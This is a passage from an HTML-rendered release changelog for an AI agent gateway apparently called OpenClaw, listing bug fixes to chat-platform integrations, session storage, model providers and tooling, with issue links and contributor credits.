<p>Telegram: honor runtime conversation bindings for native slash commands in bound top-level groups, so commands like <code>/status@bot</code> route to the active non-<code>main</code> session instead of falling back to the default route. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362659532" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75405" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75405/hovercard" href="https://github.com/openclaw/openclaw/issues/75405">#75405</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363728120" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75558" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75558/hovercard" href="https://github.com/openclaw/openclaw/pull/75558">#75558</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ziptbm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ziptbm">@ziptbm</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yfge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yfge">@yfge</a>.</p>
</li>
<li>
<p>Gateway/tasks: make task registry maintenance use pass-local backing-session lookups and fresh active child-session indexes, avoiding repeated full task snapshots and session-store clones on large stale registries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342683931" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73517" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73517/hovercard" href="https://github.com/openclaw/openclaw/issues/73517">#73517</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365145364" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75708" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75708/hovercard" href="https://github.com/openclaw/openclaw/issues/75708">#75708</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351414705" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74406" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74406/hovercard" href="https://github.com/openclaw/openclaw/pull/74406">#74406</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365146597" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75709" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75709/hovercard" href="https://github.com/openclaw/openclaw/pull/75709">#75709</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lightningxxl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lightningxxl">@Lightningxxl</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/glfruit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/glfruit">@glfruit</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jared-rebel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jared-rebel">@jared-rebel</a>.</p>
</li>
<li>
<p>Auth/sessions: JSON-clone auth-profile cache/runtime snapshots and remaining session cleanup previews instead of using <code>structuredClone</code>, preserving mutation isolation while avoiding native-memory growth on large stores. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4073238042" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45438/hovercard" href="https://github.com/openclaw/openclaw/issues/45438">#45438</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/markus-lassfolk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/markus-lassfolk">@markus-lassfolk</a>.</p>
</li>
<li>
<p>Models CLI: restore <code>openclaw models list --provider &lt;id&gt;</code> catalog and registry fallback rows for unconfigured providers, so provider-specific verification commands no longer report "No models found." Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363447158" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75517" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75517/hovercard" href="https://github.com/openclaw/openclaw/issues/75517">#75517</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364131001" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75615" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75615/hovercard" href="https://github.com/openclaw/openclaw/pull/75615">#75615</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lotsoftick/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lotsoftick">@lotsoftick</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/koshaji/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/koshaji">@koshaji</a>.</p>
</li>
<li>
<p>Gateway/macOS: write LaunchAgent services with a canonical system PATH and stop preserving old plist PATH entries, so Volta, asdf, fnm, and pnpm shell paths no longer affect gateway child-process Node resolution. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360722639" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75233" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75233/hovercard" href="https://github.com/openclaw/openclaw/issues/75233">#75233</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360954515" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75246" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75246/hovercard" href="https://github.com/openclaw/openclaw/pull/75246">#75246</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nphyde2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nphyde2">@nphyde2</a>.</p>
</li>
<li>
<p>Slack/hooks: preserve bot alert attachment text in message-received hook content when command text is blank. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368641515" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76035" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76035/hovercard" href="https://github.com/openclaw/openclaw/issues/76035">#76035</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368643379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76036" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76036/hovercard" href="https://github.com/openclaw/openclaw/pull/76036">#76036</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amsminn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amsminn">@amsminn</a>.</p>
</li>
<li>
<p>Sessions/agents: route Gateway session-store writes, CLI cleanup maintenance, and agent-delete session purges through a dedicated in-process writer and borrow the validated mutable cache during the writer slot, avoiding runtime file locks plus repeated <code>sessions.json</code> rereads and JSON clones on hot metadata updates. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288028893" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68554" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68554/hovercard" href="https://github.com/openclaw/openclaw/pull/68554">#68554</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/henkterharmsel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/henkterharmsel">@henkterharmsel</a>.</p>
</li>
<li>
<p>Control UI/chat: show inline feedback when local slash-command dispatch is unavailable or fails unexpectedly instead of clearing the composer silently. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115024686" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52105" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52105/hovercard" href="https://github.com/openclaw/openclaw/issues/52105">#52105</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MooreQiao/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MooreQiao">@MooreQiao</a>.</p>
</li>
<li>
<p>Memory/markdown: replace CRLF managed blocks in place and collapse duplicate marker blocks without rewriting unmanaged markdown, so Dreaming and Memory Wiki files self-heal from repeated generated sections. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363293115" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75491" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75491/hovercard" href="https://github.com/openclaw/openclaw/issues/75491">#75491</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363308439" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75495" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75495/hovercard" href="https://github.com/openclaw/openclaw/pull/75495">#75495</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366593323" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75810" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75810/hovercard" href="https://github.com/openclaw/openclaw/pull/75810">#75810</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368473075" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76008" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76008/hovercard" href="https://github.com/openclaw/openclaw/pull/76008">#76008</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/asaenokkostya-coder/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/asaenokkostya-coder">@asaenokkostya-coder</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ottodeng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ottodeng">@ottodeng</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/everettjf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/everettjf">@everettjf</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lrg913427-dot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lrg913427-dot">@lrg913427-dot</a>.</p>
</li>
<li>
<p>Agents/tools: return critical tool-loop circuit-breaker stops as blocked tool results instead of thrown tool failures, so models see the guardrail and stop retrying the same call. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rayraiser/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rayraiser">@rayraiser</a>.</p>
</li>
<li>
<p>Agents/sessions: preserve pre-existing runtime model and context window after heartbeat turns so a per-run heartbeat model override does not bleed into shared-session status. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363070391" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75452" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75452/hovercard" href="https://github.com/openclaw/openclaw/issues/75452">#75452</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</p>
</li>
<li>
<p>Model commands: clarify direct and inline <code>/model</code> acknowledgements for non-default selections as session-scoped. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/addu2612/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/addu2612">@addu2612</a>.</p>
</li>
<li>
<p>Doctor/gateway: stop warning that non-existent, unconfigured user-bin directories are required in the Gateway service PATH. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368545711" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76017" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76017/hovercard" href="https://github.com/openclaw/openclaw/issues/76017">#76017</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/xiphis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiphis">@xiphis</a>.</p>
</li>
<li>
<p>TUI/chat: skip full provider model normalization during context-window warmup while preserving provider-owned context metadata, avoiding cold-start stalls with large model registries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/547895019/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/547895019">@547895019</a>.</p>
</li>
<li>
<p>Agents: enable malformed tool-call argument repair for Codex and Azure OpenAI Responses transports while keeping generic OpenAI Responses paths out of the repair gate. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359521991" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75154" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75154/hovercard" href="https://github.com/openclaw/openclaw/issues/75154">#75154</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nimraakram22/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nimraakram22">@Nimraakram22</a>.</p>
</li>
<li>
<p>Memory Wiki: accept relative Markdown links that include the <code>.md</code> suffix during broken-wikilink validation, avoiding false positives for native render-mode links. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kenneth8128/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kenneth8128">@Kenneth8128</a>.</p>
</li>
<li>
<p>OpenAI Codex: show the device-pairing code in the interactive SSH/headless prompt while keeping the short-lived code out of persistent runtime logs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348981712" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74212" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74212/hovercard" href="https://github.com/openclaw/openclaw/issues/74212">#74212</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/da22le123/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/da22le123">@da22le123</a>.</p>
</li>
<li>
<p>QA Lab: stop gateway children when the suite parent disappears, so interrupted local QA runs cannot leave hot orphaned gateways behind.</p>
</li>
<li>
<p>Codex/app-server: tolerate a second connection close during startup recovery and include retry counts plus stringified errors in the restart warning, so concurrent lanes do not fail after one shared-client race.</p>
</li>
<li>
<p>Plugins/CLI: cache plugin CLI registration entries per command program so completion state generation does not repeat the full plugin sweep in one invocation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ScientificProgrammer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ScientificProgrammer">@ScientificProgrammer</a>.</p>
</li>
<li>
<p>Plugins: reuse gateway-bindable plugin loader cache entries for later default-mode loads without serving default-built registries to gateway-bound requests, reducing repeated plugin registration during dispatch. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4210492312" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61756" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61756/hovercard" href="https://github.com/openclaw/openclaw/issues/61756">#61756</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</p>
</li>
<li>
<p>Gateway/secrets: include the caught error message in <code>secrets.reload</code> and <code>secrets.resolve</code> warning logs while keeping RPC errors generic, so operators can diagnose reload and permission failures. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davidangularme/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davidangularme">@davidangularme</a>.</p>
</li>
<li>
<p>Providers/OpenRouter: fill DeepSeek V4 <code>reasoning_content</code> replay placeholders for <code>openrouter/deepseek/deepseek-v4-flash</code> and <code>openrouter/deepseek/deepseek-v4-pro</code>, so thinking/tool follow-up turns do not fail with DeepSeek's replay-shape error. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368552053" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76018" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76018/hovercard" href="https://github.com/openclaw/openclaw/issues/76018">#76018</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cloph-dsp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cloph-dsp">@cloph-dsp</a>.</p>
</li>
<li>
<p>Anthropic-compatible streams: recover text deltas that arrive before their matching content block, so Kimi Code and similar providers do not finish as empty <code>incomplete_result</code> replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368472046" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76007" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76007/hovercard" href="https://github.com/openclaw/openclaw/issues/76007">#76007</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vliuyt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vliuyt">@vliuyt</a>.</p>
</li>
<li>
<p>fix(infra): block workspace state-directory env override [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367841633" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75940" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75940/hovercard" href="https://github.com/openclaw/openclaw/pull/75940">#75940</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</p>
</li>
<li>
<p>MCP/OpenAI: normalize parameter-free tool schemas whose top-level object <code>properties</code> is missing, null, or invalid before sending tools to OpenAI, so MCP tools without params stay usable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362431372" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75362" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75362/hovercard" href="https://github.com/openclaw/openclaw/issues/75362">#75362</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tolkonepiu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tolkonepiu">@tolkonepiu</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</p>
</li>
<li>
<p>TTS: honor explicit short <code>[[tts:text]]...[[/tts:text]]</code> blocks while keeping untagged short auto-TTS suppressed, so tagged voice replies are synthesized instead of being dropped as empty voice-only payloads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345594550" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73758" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73758/hovercard" href="https://github.com/openclaw/openclaw/issues/73758">#73758</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yfge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yfge">@yfge</a>.</p>
</li>
<li>
<p>Hooks/doctor: warn when <code>hooks.transformsDir</code> points outside the canonical hooks transform directory, so invalid workspace skill paths get a direct recovery hint before the Gateway crash-loops. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367117797" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75853" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75853/hovercard" href="https://github.com/openclaw/openclaw/issues/75853">#75853</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/midobk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/midobk">@midobk</a>.</p>
</li>
<li>
<p>Proxy/audio: convert standard <code>FormData</code> bodies before proxy-backed undici fetches, so audio transcription and multipart uploads no longer send <code>[object FormData]</code> when <code>HTTP_PROXY</code> or <code>HTTPS_PROXY</code> is configured. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4085311223" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48554" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48554/hovercard" href="https://github.com/openclaw/openclaw/issues/48554">#48554</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dco5/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dco5">@dco5</a>.</p>
</li>
<li>
<p>Discord: allow explicitly configured ack reactions in tool-only guild channels while keeping automatic lifecycle/status reactions suppressed. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355990759" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74922" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74922/hovercard" href="https://github.com/openclaw/openclaw/issues/74922">#74922</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samvilian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samvilian">@samvilian</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BlueBirdBack/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BlueBirdBack">@BlueBirdBack</a>.</p>
</li>
<li>
<p>Discord: enable session-backed A2A announce target lookup so <code>sessions_send</code> uses the target session's <code>deliveryContext.accountId</code> or <code>lastAccountId</code> instead of falling back to the default bot in multi-account setups. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4055175543" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42652/hovercard" href="https://github.com/openclaw/openclaw/issues/42652">#42652</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4112523352" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51626" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51626/hovercard" href="https://github.com/openclaw/openclaw/issues/51626">#51626</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4069301815" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44773" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/44773/hovercard" href="https://github.com/openclaw/openclaw/pull/44773">#44773</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347442555" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73975" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73975/hovercard" href="https://github.com/openclaw/openclaw/pull/73975">#73975</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/irchelper/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/irchelper">@irchelper</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dpalfox/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dpalfox">@dpalfox</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lanfei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lanfei">@Lanfei</a>.</p>
</li>
<li>
<p>Discord/setup: write resolved guild/channel allowlist selections to the selected guild and channel instead of falling back to the wildcard guild during setup. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4079837629" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47788" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/47788/hovercard" href="https://github.com/openclaw/openclaw/pull/47788">#47788</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Eldersonar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Eldersonar">@Eldersonar</a>.</p>
</li>
<li>
<p>Discord: treat abort-time Carbon reconnect-exhausted events as expected shutdown during stale-socket restarts, so health-monitor restarts no longer reject the monitor lifecycle. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4176861539" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58216" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58216/hovercard" href="https://github.com/openclaw/openclaw/pull/58216">#58216</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347363347" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73949" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73949/hovercard" href="https://github.com/openclaw/openclaw/pull/73949">#73949</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Perttulands/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Perttulands">@Perttulands</a>.</p>
</li>
<li>
<p>Discord/native commands: return an explicit warning when slash command dispatch or direct plugin execution produces no visible reply instead of a success-style completion ack. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4186301600" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58986" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58986/hovercard" href="https://github.com/openclaw/openclaw/issues/58986">#58986</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213236198" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62057" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62057/hovercard" href="https://github.com/openclaw/openclaw/pull/62057">#62057</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jb510/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jb510">@jb510</a>.</p>
</li>
<li>
<p>Discord: keep typing indicators alive during long tool runs and auto-compaction while keepalive ticks continue, so active sessions do not appear stalled before the final reply. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Squirbie/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Squirbie">@Squirbie</a>.</p>
</li>
<li>
<p>Discord: preserve multipart Content-Type headers for attachment uploads across REST fetch paths, so generated images and other media no longer fail delivery with <code>CONTENT_TYPE_INVALID</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FunJim/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FunJim">@FunJim</a>.</p>
</li>
<li>
<p>Discord: preserve attachment and sticker filenames when saving inbound media, so agents can see human-readable file names instead of only UUID-based paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4195120978" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59744" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59744/hovercard" href="https://github.com/openclaw/openclaw/issues/59744">#59744</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xela92/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xela92">@xela92</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rockcent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rockcent">@rockcent</a>.</p>
</li>
<li>
<p>Discord: preserve non-ASCII channel names in session display labels while keeping allowlist matching on the existing ASCII slug contract. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/swjeong9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/swjeong9">@swjeong9</a>.</p>
</li>
<li>
<p>Discord/PluralKit: canonicalize proxied webhook turns to the original Discord message id for inbound dedupe, while preserving the proxy message id for reply routing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/acgh213/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/acgh213">@acgh213</a>.</p>
</li>
<li>
